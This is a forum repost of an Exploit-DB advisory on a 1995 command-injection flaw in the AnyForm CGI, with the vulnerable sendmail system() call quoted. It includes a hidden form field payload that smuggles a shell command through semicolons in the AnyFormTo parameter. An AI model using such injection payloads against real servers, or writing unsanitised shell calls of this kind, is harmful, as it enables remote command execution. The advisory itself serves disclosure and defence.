Exploit John S.2 Roberts AnyForm 1.0/2.0 - CGI Semicolon

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19557
Проверка EDB
  1. Пройдено
Автор
PAUL PHILLIPS
Тип уязвимости
REMOTE
Платформа
LINUX
CVE
cve-1999-0066
Дата публикации
1995-07-31
John S.2 Roberts AnyForm 1.0/2.0 - CGI Semicolon
Код:
source: https://www.securityfocus.com/bid/719/info

AnyForm is a popular form CGI designed to support simple forms that deliver responses via email. Certain versions of AnyForm did not perform user supplied data sanity checking and could be exploited by remote intruders to execute arbitrary commands. These commands were issued as the UID which the web server runs as, typically 'nobody'. 

Exploit as taken from the original post on this issue:

To exploit, create a form with a hidden field something like this:

<input type="hidden" name="AnyFormTo" value="[email protected];command-to-execute
with whatever arguments;/usr/lib/sendmail -t [email protected] ">

Then submit the form to the "AnyForm" CGI on the server to be attacked.
The value of this parameter is passed to this code:

SystemCommand="/usr/lib/sendmail -t " + AnyFormTo + " <" + CombinedFileName;
system(SystemCommand);

Since system invokes a shell, the semicolons are treated as command
delimeters and anything can be inserted
 
Источник
www.exploit-db.com